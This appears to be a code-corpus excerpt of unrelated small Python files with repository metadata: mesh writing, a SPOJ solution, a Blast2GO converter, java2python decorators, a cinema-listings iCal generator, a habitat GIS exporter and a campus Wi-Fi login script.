1: xmin = str(nodes[0]) xmax = str(nodes[nodes.size-1]) g.write('Point(1)={'+xmin+',0,0,1.0};\n') g.write('Point(2)={'+xmax+',0,0,1.0};\n') g.write('Line(3)={1,2};\n') else: print 'dimension not supperoted yet' g.close() #------------------------------------------------------------------------ #------------------------ Headers for .msh file------------------------ f.write('$MeshFormat\n') f.write('2.2 0 8\n') f.write('$EndMeshFormat\n') #------------------------ nodes for the .msh file------------------------ f.write('$Nodes\n') vec = np.zeros((np.shape(nodes)[0], 1)) for i in range(0,np.shape(nodes)[0]): vec[i,0] = i+1 # Enumeration of nodes if nodes.ndim==1: nodes = np.array([nodes]).T # Conversion for coordinates with y and z nodes = hstack((nodes,np.zeros((np.shape(nodes)[0], 2)))) nPoi = str(np.shape(nodes)[0]) nodes = hstack((vec, nodes)) # Enumeration added to the array f.write(nPoi+'\n') np.savetxt(f, nodes, fmt = '%d %f %f %f') f.write('$EndNodes\n') #------------------------ Elements for the .msh file------------------------ f.write('$Elements\n') f.write(n_elements+'\n') n_elements=int(n_elements) vec=np.zeros((n_elements,5)) NodPerEl=elements.ndim # For line elements there should be 2 nodes per element # Point elements ------------------------------------------------------- if NodPerEl==2: ePoints=np.zeros((2,6)) ePoints[0,:]=[1,15,2,0,1,1] 
ePoints[1,:]=[2,15,2,0,2,n_nodes] np.savetxt(f,ePoints,fmt='%d') #----------------------------------------------------------------------- # Line elements 1D ----------------------------------------------------- if NodPerEl==2: for i in range(0,n_elements): vec[i,0]=i+3 vec[i,1:5]=[1,2,0,3] ## elements =elements[:,1:5] #----------------------------------------------------------------------- # Line elements 2D ----------------------------------------------------- else: for i in range(0,n_elements): vec[i, 0] = i+1 vec[i, 1:5] = [2,2,0,6] elements = elements[:, 1:5] #----------------------------------------------------------------------- elements = hstack((vec, elements)) if NodPerEl==2: np.savetxt(f, elements, fmt = '%d %d %d %d %d %d %d') else: np.savetxt(f, elements, fmt = '%d %d %d %d %d %d %d %d') f.write('$EndElements\n') def write_solver_input(output, dimension = 1, bc_type = 'Dir', parameter = [],\ eq = 'Schro', sol_type = 'Stationary', \ analysis_param = ['y', 'y', 4, 4, 20, 20, 2], \ bc_filename = ''): """ Write the solver input into a file of gmsh ASCII format V2.2. This input is to be read by the Solver module. Parameters: ----------- output: String with the name of the file that contains the information regarding the geometry, mesh, border conditions, and other parameters necessary for the solution of the problem. This file is a modified Gmsh output file with extension .msh dimension: int parameter that tells the program wether to solve for a 1D problem or a 2D problem (not supported yet) parameter: Is an array that describes the potential actuating over the the elements of the domain given by Elems. For each element in Elems there is an associated potential value on the same position in the array parameter. The potential in Scroedinger equation defines the specific nature of the problem to be solved. For more details on how to define a potential and what does it mean pleas read the documentation of the Potential1D function in the module PrePro. bc_type: String parameter for the selection of a border condition that can be either: 'Dir' For the Dirichlet border condition (Infinite potential well). 'Bloch' For the periodic formulation of the problem. (Electron in a periodic material ) sol_type: String that tells wether to solve the stationary version of the equation or another not yet suported. 'Stationary' analysis_Param: Array that contains the information regarding the number of solutions to be computed and wether to save the values or not. analysis_param[0]: String answer to the question save Eigen Values? analysis_param[1]: String answer to the question save Eigen Vectors? analysis_param[2]: Integer number of Eigen Values to save analysis_param[3]: Integer number of Eigen Vectors to save analysis_param[4]: Integer number of wave numbers in x to sweep analysis_param[5]: Integer number of wave numbers in y to sweep analysis_param[6]: biggest value of k. 
it may be the lenght of the dommain bc_filename: string that tells where to look for the boundary conditions Returns: -------- Last modification: date 25/10/2011 """ f = open(output, 'r+') line = f.readline() while '$Solver' not in line: here = f.tell() line = f.readline() if '$Solver' in line: f.seek(here) f.truncate() break if line == '': break f.write('$Solver input\n') dimension = str(dimension) f.write(dimension +'\n') f.write(bc_type +'\n') np.savetxt(f, parameter, fmt = '%f') f.write(eq +'\n') f.write(sol_type +'\n') b = str(analysis_param) b = b.replace("'", "") f.write(b+'\n') f.write(bc_filename+'\n') f.write('$End Solver input\n')
UTF-8
Python
false
false
2,014
19,567,871,008,730
58130897d5d94f27284b81b2fc2ef8661cf02acf
ac3bee33ff69b98ceb4a30b130684af7d37d4eba
/SUMUP.py
41e25f8925c0fb9ba98605bb2c5bbefba45ad97b
[]
no_license
swapnil-warke/spoj.pl_solutions
https://github.com/swapnil-warke/spoj.pl_solutions
154441fe9f44e117039c9b22988426f5dac044c2
d7699780c52471a8fb0e5d7a6c4ebeb4a070e4dc
refs/heads/master
2021-05-29T01:17:20.092948
2013-01-18T21:58:39
2013-01-18T21:58:39
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
def S(n):
    return (1/2)*(1-(1/(n**2+n+1)))

for t in range(int(input())):
    print("{0:.5f}".format(S(int(input()))))
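One caveat on the snippet above: the closed form relies on true division, so it only produces non-zero values under Python 3 (under Python 2, both 1/2 and 1/(n**2+n+1) are integer divisions that evaluate to 0). A sketch that is explicit about floats and behaves the same either way:

def S(n):
    # Float literals keep the formula correct even under integer division.
    return 0.5 * (1.0 - 1.0 / (n**2 + n + 1))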
UTF-8
Python
false
false
2,013
910,533,091,768
395e9ed8c8ff90f495c49ecd42fb0a33b5407e87
84a3f5518ed48ce353f4aef88ca5a8392f768af3
/python/bieber/bieber.py
6c5a7e45fd07ec3b8393b7b40e3d440d0bbd9b69
[]
no_license
seishinryohosha/school
https://github.com/seishinryohosha/school
e36054314db42a69e456672b6f593118e5715848
0d4f77a513d165aee1fdf4a326159fbeed4f9808
refs/heads/master
2020-12-24T14:56:59.891485
2014-12-09T07:22:48
2014-12-09T07:22:48
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/python

def printDiagramm(n):
    """Prints diagram of biebers way"""
    friends = []
    sign = '<'
    for i in range(n):
        friends.append(97+i)  # Char 97 = 'a'
    for i in range(0, n-1, 2):
        print(chr(friends[i]), " ", chr(friends[i+1]), " ", end="")
    if n%2 != 0:
        print(chr(friends[n-1]), end="")
    print()
    for i in range(0, n-1, 2):
        print("-- -- ", end="")
    if n%2 != 0:
        print("-- --", end="")
    print()

def whichFriendToVisit(n, d):
    if (d > n):
        d %= n

printDiagramm(7)
UTF-8
Python
false
false
2,014
4,544,075,406,181
f5624d92334f0124191c46e256d914d03bcdec7e
a6ccedc7fcd640700b6fd524cc53f24763a8f770
/collect_go.py
2a1f069a539ea2416b67feecf16602a7b460d48a
[]
no_license
mikheyev/monomorium-polyethism
https://github.com/mikheyev/monomorium-polyethism
e2e5bf3bbb8796fcbcb8dd052b41c0f607f53ad7
ff2bc47821748a776747af108d03cc27578aa6f2
refs/heads/master
2020-04-29T02:41:11.719739
2014-12-02T00:40:46
2014-12-02T00:40:46
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import pdb

""" collect go terms from file, and convert them into sql-friendly csv """

infile = open("blast2go_export.txt")

goTable = open("go_table.csv","w")
goTable.write("isoform,GO\n")

blastTable = open("blast_table.csv","w")
blastTable.write("isoform,evalue,hit,species\n")

infile.readline()
for line in infile:
    line = line.split("\t")
    blastTable.write(",".join(line[0:2]+['"'+line[2].split("[")[0].rstrip()+'"']+[line[3]])+"\n")
    for go in line[4].split(";"):
        goTable.write(",".join([line[0],go.strip()])+"\n")
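The script above assembles CSV rows by hand and quotes only the hit description. For comparison, a hedged sketch of the same blast-table step using the standard csv module, which quotes fields uniformly; the column slicing mirrors the code above and is written for Python 3:

import csv

# Hypothetical rewrite of the blast-table loop with csv.writer.
with open("blast_table.csv", "w", newline="") as fh:
    blast_writer = csv.writer(fh)
    blast_writer.writerow(["isoform", "evalue", "hit", "species"])
    for raw in open("blast2go_export.txt").readlines()[1:]:   # skip the header line
        cols = raw.split("\t")
        hit = cols[2].split("[")[0].rstrip()
        blast_writer.writerow([cols[0], cols[1], hit, cols[3]])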
UTF-8
Python
false
false
2,014
137,438,987,971
978541c53c65c9227b2fa802ab602da48ff8ca4a
efbe083d80cb0264dc389ce81fa2f52b3e671230
/j2py/java/decorators.py
ffd410a50f4c7751033e0f28592bd346bc95d90a
[]
no_license
jamesonquinn/java2python
https://github.com/jamesonquinn/java2python
b2e0b994a06a4b1b6e82e650772a0c06bf00d678
a70e42886312a7dff97f3fa13e2b35efabfcf880
refs/heads/master
2021-01-18T16:52:09.866626
2010-11-09T19:14:20
2010-11-09T19:14:20
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from inspect import isfunction def static(something): #print "@static", something,isfunction(something) if isfunction(something): return classmethod(something) else: return staticclass(something) def abstract(f): return f def protected(f): return f def volatile(f): return f def final(f): return f def private(f): return f def public(f): return f def constructor(func): return func def interface(*methodNames): def rememberMethods(c): c.__nummethods__ = len(methodNames) c.__methodnames__ = methodNames return c return rememberMethods class dummyClass(object): pass def makeNewFun(f,pos,t): """Return a verson of f which can take a function as argument number pos, by putting it as the method of an object of interface t""" def newFun(*args): if len(args) > pos and callable(args[pos+1]): # pos+1 because "self" is at 0 newargs = list(args) dummyO = dummyClass() dummyO.__setattr__(t.__methodnames__[0],args[pos+1]) newargs[pos+1] = dummyO return f(*newargs) else: return f(*args) return newFun def typed(*sig): def add_sig(f): #functions whose signature includes a one-method interface should accept a function there too; #it's more pythonic that way for pos,t in enumerate(sig): if hasattr(t,"__nummethods__") and t.__nummethods__ == 1: f = makeNewFun(f,pos,t) #now just note the type signature f._type_sig = sig return f return add_sig def typeid(a): if isinstance(a,list) or isinstance(a,tuple): return tuple(typeid(i) for i in a) elif isinstance(a,type): return a else: return type(a) def argtypeid(a,d=0): if isinstance(a,tuple): return tuple(argtypeid(i,d+1) for i in a) elif isinstance(a,list): return (argtypeid(a[0]),) #TODO: add check, if all types are equal else: t = type(a) if t == unicode: t = str return t class init(object): def __repr__(self): if self.klass is None: return "<init decorator for %s>" % repr(self.init) else: return "<init %s>" % self.klass.__name__ def __init__(self,f): #print "@init __init__",self,f self.registry = {} self.self = None self.klass = None self.init = f self.inits = None def __get__(self,obj,klass): #print "@init __get__",self,obj,klass if obj is not None: self.self = obj self.klass = klass return self def register_func(self, func, sig): #print "@init register_func",self,func,sig key = typeid(sig) self.registry[key] = func def register(self,func): #print "@init register",self,func self.register_func(func,func._type_sig) return self def _super(self,*a): key = argtypeid(a) #print "init super",a,"key",key for i in reversed(self.inits[:-1]): func = i.registry.get(key,None) if func is not None: #print " call super", func func(self.self,*a) return def __call__(self,*a): key = argtypeid(a) #print "@init __call__",self,a,key # find constructors for base classes if self.inits is None: k = self.klass inits = [] while True: inits.insert(0,k.__init__) #print " .. bases", k.__bases__ base_found = False for b in k.__bases__: try: i = b.__init__ #print " ...init=",i if isinstance(b.__init__,init): #print "found one",b k = b base_found = True except: pass #print "no java baseclass",b if not base_found: break #print " ... 
inits:",inits self.inits = inits # call __init__ for all java base classes for i in self.inits: #print " var-init",i.init i.init(self.self) # find and call __init__(key) #inits.reverse() for i in reversed(self.inits): func = i.registry.get(key,None) if func is not None: #print " constr init", func func(self.self,*a) return if key == tuple(): #print "@init __call__ () not registered" pass else: raise RuntimeError("No constructor found for signature " + str(key)) class innerclass(object): def __init__(self,innerclass): #print "innerclass init",innerclass self.innerclass = innerclass def __get__(self,obj,typename): #print "innerclass get",obj,typename self.upperclass = typename self.innerclass.upperclass = typename return self.innerclass class staticclass(object): def __init__(self,innerclass): #print "staticclass init",innerclass self.innerclass = innerclass def __get__(self,obj,t): #print "staticcclass get",obj,t self.self = obj self.t = t return self def __call__(self,*a): #print "staticclass call",a return self.innerclass.__get__(None,self.t) class overloaded(object): def __init__(self,f): #print "overloaded init",f self.registry = {} try: self.register_func(f,f._type_sig) except: self.register_func(f,tuple()) def __get__(self,obj,t): #print "overloaded get",obj,t self.self = obj self.t = t return self def register_func(self, func, sig): key = typeid(sig) self.registry[key] = func def register(self,f): self.register_func(f,f._type_sig) return self def __call__(self,*a): #print "overloaded call",a key = argtypeid(a) func = self.registry.get(key,None) if func is not None: if self.self is not None: return func(self.self,*a) else: return func(*a) else: raise RuntimeError("no function for signature " + str(key)) def implements(*interfaces): def helper(klass): klass._interfaces = interfaces return klass return helper def extends(*interfaces): def helper(klass): klass._extends = interfaces return klass return helper def use_class_init(klass): klass.class_init() return klass
UTF-8
Python
false
false
2,010
4,028,679,356,801
a6d0d4b6d657c70ca22f3e01aa885b3eafcdefe9
ca107dcf9a2bff9a1533f969293a25da9c11aa5c
/other/scan_dir.py
59bd0f3ea016592dd7fc3a51d1afd6ee6c08bb5e
[ "CC-BY-NC-ND-3.0", "GPL-3.0-only" ]
non_permissive
CubeSugar/MiniSearchEngine
https://github.com/CubeSugar/MiniSearchEngine
23a1ff15d7565108f1a7a0973f88a25941462c02
850259231156ac45c146ac92957b96549854d802
refs/heads/master
2021-01-19T08:33:46.803784
2013-08-15T15:47:54
2013-08-15T15:47:54
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
'''
    P2 Project
    scan RawData dir
'''
import os
import sys

'''
v1.0
def getDirList(path, level = 0, indent = True):
    if indent:
        for tab in range(level):
            print('\t', end = '')
    DirList = os.listdir(path)
    for each_file in DirList:
        if os.path.isdir(each_file):
            getDirList(each_file, level + 1)
        else:
            print(each_file)
'''

'''
v1.1
print dir tree
'''
def getDirList(path, level = 0, indent = True):
    DirList = os.listdir(path)
    for each_file in DirList:
        if indent:
            for tab in range(level):
                print(' ', end = '')
        print(path + '/' + each_file)
        subpath = os.path.join(path, each_file)
        if os.path.isdir(subpath):
            getDirList(subpath, level + 1)

'''
define function
print file name to a txt
'''
def storeFileName(path):
    DirList = os.listdir(path)
    for each_file in DirList:
        subpath = os.path.join(path, each_file)
        if os.path.isdir(subpath):
            storeFileName(subpath)
        else:
            try:
                with open('result.txt', 'a') as ResultFile:
                    print(each_file, file = ResultFile)
            except IOError as err:
                print('IOError :' + str(err))

def storeDirPath(path):
    DirList = os.listdir(path)
    #oldPath = path
    storePath = []
    for each_file in DirList:
        subpath = os.path.join(path, each_file)
        if os.path.isdir(subpath):
            #oldPath = subpath
            storeDirPath(subpath)
        else:
            print(os.path.dirname(subpath))

'''
try:
    with open('dp.txt', 'w') as dp:
        for each_item in storePath:
            print(each_item, file = dp)
except IOError as err:
    print('IOError : ' + str(err))
'''

#print(os.getcwd())
#os.chdir('../Documents/ProgrammingExercise/Project/P2')

rootpath = './RawData'
testpath = './Test'

#getDirList(testpath)
#storeFileName(testpath)
storeDirPath(rootpath)
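For reference, the recursive directory scans above can also be expressed with os.walk from the standard library; a minimal sketch (the function name is illustrative, not from the project):

import os

def walk_dir(path):
    # Print every file with its containing directory, similar to getDirList/storeDirPath above.
    for dirpath, dirnames, filenames in os.walk(path):
        for name in filenames:
            print(os.path.join(dirpath, name))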
UTF-8
Python
false
false
2,013
9,646,496,551,273
9f648e9c87636c317e680b49f812b404119221eb
b2289688ef0f2f6df16d4600742bcdfc1d373def
/massmail.py
d109f81d757c43a0757bce202a8666222c8c32c1
[]
no_license
FranciscoDA/hotel-booking
https://github.com/FranciscoDA/hotel-booking
9e422791899a61ae9321a67996595fd16b3de36c
7ef90904e3ec51bbb70d8bd9d06e3def78024204
refs/heads/master
2020-04-05T23:29:17.427093
2014-08-05T04:55:44
2014-08-05T04:55:44
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# A mass mail test.
# Not quite sure of wtf was I trying to accomplish here...
from booking.models import Guest

mails = [guest.email for guest in Guest.objects.all()]
rec = ['[email protected]', '[email protected]',]
subject = 'Envío masivo'
msg = 'Ahora sí. Un mail por cada destinatario.'

print(mails)
UTF-8
Python
false
false
2,014
18,786,186,957,880
cb19b0f93caa2684b53741e84e69bc99128e2c9d
a88356572f205319a779255715f533c850d62337
/kapai/services/passport/__init__.py
053fe0127ad10c37a502aa08dfb46409fefb1600
[]
no_license
zaykl/kae
https://github.com/zaykl/kae
89795fa059819d70d1f68101aa793069749cd283
831d04caff9b8de07310de019d3ac479a7df21f9
refs/heads/master
2015-08-07T22:56:35.859724
2013-05-26T04:34:51
2013-05-26T04:34:51
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding:utf-8 -*-
# import functions (导入函数)
from passport import *
UTF-8
Python
false
false
2,013
6,966,436,965,929
f7b6ce26c97a5864fac32d370c1f89c65c6fcf05
c7715f2c08e8bd6b42d574637b01b9212b34b1bc
/monoalphabetic.py
190175f05585426cd72f08b58f3c6da5fd96d503
[]
no_license
B-Rich/Ciphers
https://github.com/B-Rich/Ciphers
702e69b95d767c996e1e4b8cebeec88f229ac570
e1655813bf9120106c3acc29d319959deb22624d
refs/heads/master
2021-01-15T08:20:04.582330
2012-08-07T18:44:45
2012-08-07T18:44:45
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/python2.7

import argparse
import string

def get_sub_map(from_alphabet,to_alphabet):
    '''
    Creates the dictionary for substitution lookup.
    Uses from_alphabet as keys and to_alphabet as values
    '''
    sub_map = {}
    for i in range(len(from_alphabet)):
        sub_map[from_alphabet[i]] = to_alphabet[i]
    return sub_map

def substitute(in_text,substitution_map):
    out_text = []
    for i in in_text:
        if i not in substitution_map:
            out_text.append(i)
        else:
            out_text.append(substitution_map[i])
    return ''.join(out_text)

def create_cipher(args):
    """
    A simple monoalphabetic substitution cipher with a user-supplied alphabet.
    Note that we are only working with letters so the supplied alphabet must
    be 26 characters long.
    """
    if args.text:
        in_text = args.text.upper()
    elif args.file:
        in_text = open(args.file).read().upper()
    if args.cipher:
        sub_map = get_sub_map(string.ascii_uppercase,args.alphabet)
    elif args.decipher:
        sub_map = get_sub_map(args.alphabet,string.ascii_uppercase)
    return substitute(in_text,sub_map)

parser = argparse.ArgumentParser(description="A cipher")
parser.add_argument('--cipher','-c',help="Cipher the text", action="store_true")
parser.add_argument('--decipher','-d',help="Decipher the text", action="store_true")
parser.add_argument('--text','-t',help="The text to work on.")
parser.add_argument('--file','-f',help="The file to work on.")
parser.add_argument('alphabet',help="The substitution alphabet to use.")
parser.set_defaults(func=create_cipher)
args = parser.parse_args()
print args.func(args)
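A small sketch of using the two helpers above directly, bypassing argparse; the 26-letter key is an illustrative example, not one taken from the repository:

import string

key = 'QWERTYUIOPASDFGHJKLZXCVBNM'   # hypothetical substitution alphabet
enc = substitute('ATTACK AT DAWN', get_sub_map(string.ascii_uppercase, key))
dec = substitute(enc, get_sub_map(key, string.ascii_uppercase))
print(enc)   # ciphered text under the example key
print(dec)   # round-trips back to 'ATTACK AT DAWN'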
UTF-8
Python
false
false
2,012
1,314,259,992,991
4150312d90908bd55fefb996f222335ab8b41ba6
ebb9b9319115f9163984eca18edf3d7d61c1f4d7
/tasks.py
12895c2a06d2fa3fca67abc219a07258554209c2
[]
no_license
benburry/bfical
https://github.com/benburry/bfical
a4409b39ff3c5c526329f54df474a28086ddc54d
1c2ea6434390e3fab12936b8ee5b460cfed74a14
refs/heads/master
2020-04-05T23:04:11.752531
2010-12-11T00:34:13
2010-12-11T00:34:13
1,009,870
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from BFIParser import BFIParser from google.appengine.ext import webapp from google.appengine.ext.webapp import util from google.appengine.api.labs import taskqueue from google.appengine.api import memcache from google.appengine.ext import db from google.appengine.ext import ereporter from google.appengine.ext.webapp import template from models import Event, Showing from datetime import date, timedelta from icalendar.cal import Calendar, Event as CalEvent import time import logging import os import pytz ereporter.register_logger() DEBUG = os.getenv('SERVER_SOFTWARE').split('/')[0] == "Development" if os.getenv('SERVER_SOFTWARE') else False QUEUE_RETRY = 5 ICS_CACHEKEY_TMPL = 'cal-%s-%s' HOME_CACHEKEY_TMPL = 'home-%s' LATCH_CACHEKEY_TMPL = 'lat-%s-%s' GB_TZ = pytz.timezone('Europe/London') def generate_homepage(location='southbank', weekoffset=0): today = date.today() if weekoffset > 0: startdate = today + timedelta((weekoffset * 7) - today.weekday()) enddate = startdate + timedelta(7) else: startdate = today enddate = startdate + timedelta(7 - startdate.weekday()) showings = db.Query(Showing).filter("master_location", location).filter("start >=", startdate).filter("start <", enddate).order("start").fetch(1000) path = os.path.join(os.path.dirname(__file__), 'templates', 'index.html') return template.render(path, {"showings": showings, "location": location, "page": weekoffset, "startdate": startdate,}) def generate_ics(showings, location): calendar = Calendar() caplocation = location.capitalize() calendar.add('prodid', '-//BFiCal %s Calendar//bfical.com//' % caplocation) calendar.add('version', '2.0') for showing in showings: if showing.master_location == location: calevent = CalEvent() if showing.ident: calevent.add('uid', '%[email protected]' % showing.ident) else: calevent.add('uid', '%[email protected]' % int(time.time())) calevent.add('summary', showing.parent().name) calevent.add('description', showing.parent().precis) calevent.add('location', '%s, BFI %s, London' % (showing.location, caplocation)) calevent.add('dtstart', showing.start.replace(tzinfo=GB_TZ).astimezone(pytz.utc)) calevent.add('dtend', showing.end.replace(tzinfo=GB_TZ).astimezone(pytz.utc)) calevent.add('url', showing.parent().src_url) calevent.add('sequence', int(time.time())) # TODO - fix #calevent.add('dtstamp', datetime.datetime.now()) calendar.add_component(calevent) return calendar def generate_calendar(location = 'southbank', sublocation=None): showings = db.Query(Showing).filter("start >=", date.today()) if sublocation is not None: showings = showings.filter("location", sublocation) return generate_ics(showings, location) def continue_processing_task(request): retrycount = request.headers['X-AppEngine-TaskRetryCount'] logging.debug("Queue retry count:%s" % retrycount) return retrycount is None or int(retrycount) <= QUEUE_RETRY class UpdateHandler(webapp.RequestHandler): def get(self): return self.post() def post(self, location='southbank'): memcache.set(ICS_CACHEKEY_TMPL % (location, None), generate_calendar(location, None), time=1800) listing_urls = BFIParser.generate_listing_urls() countdown = 1 cachekey = LATCH_CACHEKEY_TMPL % (location, time.time()) for url in listing_urls: logging.debug("Queueing listing url:%s" % url) taskqueue.add(url='/tasks/process_listings_url', params={'url': url, 'cachekey': cachekey}, queue_name='background-queue', countdown=countdown) countdown = countdown + 1 self.response.out.write(listing_urls) class PurgeHandler(webapp.RequestHandler): def get(self): self.post() def post(self): 
memcache.flush_all() db.delete(Showing.all()) db.delete(Event.all()) handler = UpdateHandler() handler.initialize(self.request, self.response) handler.post() class ListingsHandler(webapp.RequestHandler): def post(self): if continue_processing_task(self.request): (year, urls) = BFIParser.parse_listings_page(self.request.get('url')) countdown = 1 cachekey = self.request.get('cachekey') for url in urls: if memcache.get(url) is None: memcache.set(url, 1, time=1800) logging.debug("Queueing event url:%s" % url) remaining = memcache.incr(cachekey, initial_value=0) logging.debug("Incremented remaining count to %s" % remaining) taskqueue.add(url='/tasks/process_event_url', params={'url': url, 'cachekey': cachekey, 'eventyear': year}, queue_name='background-queue', countdown=countdown) countdown = countdown + 1 self.response.out.write(url) else: logging.debug("Already process(ed|ing) url %s" % url) class GenerateHandler(webapp.RequestHandler): def post(self): for location in BFIParser.LOCATIONS: memcache.set(HOME_CACHEKEY_TMPL % location, generate_homepage(location), time=86400) memcache.set(ICS_CACHEKEY_TMPL % (location, None), generate_calendar(location, None), time=86400) class EventHandler(webapp.RequestHandler): def post(self, location='southbank'): if continue_processing_task(self.request): eventurl = self.request.get('url') eventyear = int(self.request.get('eventyear')) cachekey = self.request.get('cachekey') logging.debug("Processing event url %s for year %s" % (eventurl, eventyear)) # Parse page bfievent = BFIParser.parse_event_page(eventurl, eventyear) def persist_showings(dbevent, bfievent): # Delete existing showings for this event db.delete(db.Query(Showing).ancestor(dbevent)) # Save events for showing in bfievent.showings: Showing(parent=dbevent, ident=showing.id, location=showing.location, master_location=location, start=showing.start, end=showing.end).put() event = Event.get_or_insert(key_name=bfievent.url, src_url=db.Link(bfievent.url), name=bfievent.title, precis=bfievent.precis, year=bfievent.year, directors=bfievent.directors, cast=bfievent.cast, description=bfievent.description) event.src_url=db.Link(bfievent.url) event.name=bfievent.title event.precis=bfievent.precis event.year=bfievent.year event.directors=bfievent.directors event.cast=bfievent.cast event.description=bfievent.description event.put() db.run_in_transaction(persist_showings, event, bfievent) logging.debug("Processed event url %s" % eventurl) remaining = memcache.decr(cachekey, initial_value=0) logging.debug("Decremented remaining count to %s" % remaining) if remaining <= 0: db.delete(db.Query(Showing).filter("updated <", date.today())) db.delete(db.Query(Event).filter("updated <", date.today())) memcache.delete(HOME_CACHEKEY_TMPL % location) taskqueue.add(url='/tasks/generate_calendar') def main(): logging.getLogger().setLevel(logging.DEBUG if DEBUG else logging.WARN) application = webapp.WSGIApplication([ ('/tasks/update', UpdateHandler), ('/tasks/purge', PurgeHandler), ('/tasks/process_listings_url', ListingsHandler), ('/tasks/process_event_url', EventHandler), ('/tasks/generate_calendar', GenerateHandler), ], debug=DEBUG) util.run_wsgi_app(application) if __name__ == '__main__': main()
UTF-8
Python
false
false
2,010
13,761,075,254,120
730da492e2de7bfa496073d0369f47b4e4241051
1e754d56215f70bf5d16aa18bf064cd6c804bbca
/OtherCodeIhaveYetToSiftThrough/Sigil Project/Previous Work/CE proj/Previous Releases/CameraEnginePR.0.2.0/CameraEngine/__init__.py
eac7bda183e1337f45dc4496c11c0c88e5110b9c
[]
no_license
alex-polosky/MyOldCode
https://github.com/alex-polosky/MyOldCode
b4cd2113b33c0bc7a985f1f1c27a1081a874ad00
a4c80f14b0aad05621e517999b8eaf991808a08f
refs/heads/master
2020-02-05T17:14:37.241508
2014-05-01T04:07:06
2014-05-01T04:07:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import pygame
import screen
import sprite
import tools
import version
import world

# I want to implement a simple HUD class
# Use the HUD class for displaying any
# scores or other important data
# also, perhaps a Particles Engine

#class MainLoop():
#
#    def __init__(self):
#        pygame.init()
#
#S = screen.Screen((800, 600), "Test", 0)

#if __name__ == '__main__':
#    ML = MainLoop()
UTF-8
Python
false
false
2,014
13,984,413,516,627
7dd2176c3aa232509fb7e94ef08fe763aaeac3ba
e4eb65fb5e42d8ac602f02b78a699fa38c90741d
/output-habitats.py
87784be85b2bfd59aa007aede54a081609e92ccd
[]
no_license
perlfu/open-habitats
https://github.com/perlfu/open-habitats
bcf55f917aa3493f8b37473f6d8796e3c7525b1f
179b160ef04d153e2a76402d2a47ac1095906250
refs/heads/master
2020-04-06T14:09:45.698046
2014-05-12T10:12:49
2014-05-12T10:12:49
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python

import sys
import psycopg2
import json
import shapely.wkt

from habitats import *

limits = {
    H_NONE: 0,
    H_URBAN: 100,
    H_WOOD: 0,
    H_WETLAND: 30,
    H_WATER: 20,
    H_RIVER: 20,
    H_GRASSLAND: 30,
    H_ARABLE: 150,
    H_SEMINATURAL: 30,
    H_MOUNTAIN: 0
}

if len(sys.argv) < 2:
    print 'output-habitats <destination>'
    sys.exit(1)

destination = sys.argv[1]

conn = psycopg2.connect("dbname=gis")
cur = conn.cursor()

cur.execute("SELECT link_id, polygon_id FROM habitat_link")
results = cur.fetchall()

transports = []
_links = {}
links = {}
for (link_id, polygon_id) in results:
    if polygon_id not in links:
        links[polygon_id] = set()
    links[polygon_id].add(link_id)
    _links[link_id] = True
for link_id in _links.keys():
    transports.append({'id': str(link_id), 'type': 'land'})

results = []
for h_type in limits.keys():
    if limits[h_type] > 0:
        cur.execute("SELECT polygon_id, h_type, ST_AsText(geom) FROM habitat WHERE h_type = %s ORDER BY ST_Area(ST_Transform(geom, 27700)) DESC LIMIT %s;", (h_type, limits[h_type]))
        results.extend(cur.fetchall())

habitats = []
for (_id, _type, geom) in results:
    print _id, _type
    shape = shapely.wkt.loads(geom)
    points = []
    for (x, y) in shape.exterior.coords:
        points.append(float("%.6f" % x))
        points.append(float("%.6f" % y))
    if _id in links:
        _links = map(str, links[_id])
    else:
        _links = []
    habitats.append({
        'id': str(_id),
        'type': type_map[_type],
        'points': points[0:-2],
        'regulation': [],
        'links': _links
    })

conn.close()

fh = open(destination, 'wb')
fh.write("ESD.modelDescriptor['transports'] = ")
json.dump(transports, fh, sort_keys=True, indent=2)
fh.write(";\n")
fh.write("ESD.modelDescriptor['habitats'] = ")
json.dump(habitats, fh, sort_keys=True, indent=2)
fh.write(";\n")
fh.close()
UTF-8
Python
false
false
2,014
9,156,870,295,631
1e110ad7a94bc29bd2bf3b2e20ca83c57e6e2800
b566d27127860bfc3e6ea9eec3c8a3fb173540c4
/utwlan-w_auth.py
d136f80817243ff868958ed05e4a1b8b657e1839
[]
no_license
ytn86/U-Tsukuba-Auth
https://github.com/ytn86/U-Tsukuba-Auth
94b09c845f7d3f77fba10d91d4b9532a9df64eed
13f13339ea3d66682dc320719f1ebfc53c2fb7aa
refs/heads/master
2021-01-10T19:37:11.540896
2014-07-25T10:49:34
2014-07-25T10:49:34
22,253,560
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!python3

from urllib.request import urlopen
from urllib.parse import urlencode


def auth(id, pw):
    url = 'https://wlan-auth1.cc.tsukuba.ac.jp/login.html'
    params = urlencode({'buttonClicked': '4',
                        'err_flag': '0',
                        'username': id,
                        'password': pw,
                        'Submit': 'login'})
    handler = urlopen(url, params.encode('utf-8'))
    print(handler.read())


def main():
    id = "<Your id>"
    pw = "<Your password>"
    auth(id, pw)


if __name__ == "__main__":
    main()
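For reference, a minimal sketch (not part of this repo) of driving auth() without editing the hard-coded placeholders, reading the credentials from environment variables instead; the variable names are invented for illustration.

# Sketch only: the environment variable names UTWLAN_ID and UTWLAN_PW are
# hypothetical, not something the original script defines.
import os

def main():
    id = os.environ["UTWLAN_ID"]   # hypothetical variable name
    pw = os.environ["UTWLAN_PW"]   # hypothetical variable name
    auth(id, pw)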
UTF-8
Python
false
false
2,014
4,355,096,869,282
411a68703729283332c6401f287d1e642c8ace66
207288b80ae59f5a40601d5a29dac1303de7b1f4
/main/middleware.py
728c1934051dd209c09eb45841139ccd00f382bc
[]
no_license
Anc813/cctest
https://github.com/Anc813/cctest
7d88248118f86a9d2c7e904c0c5c03608c089da8
327b32ce9af3b81149160afdb7ce8ad043024bba
refs/heads/master
2021-01-01T17:32:10.838102
2013-12-08T18:06:34
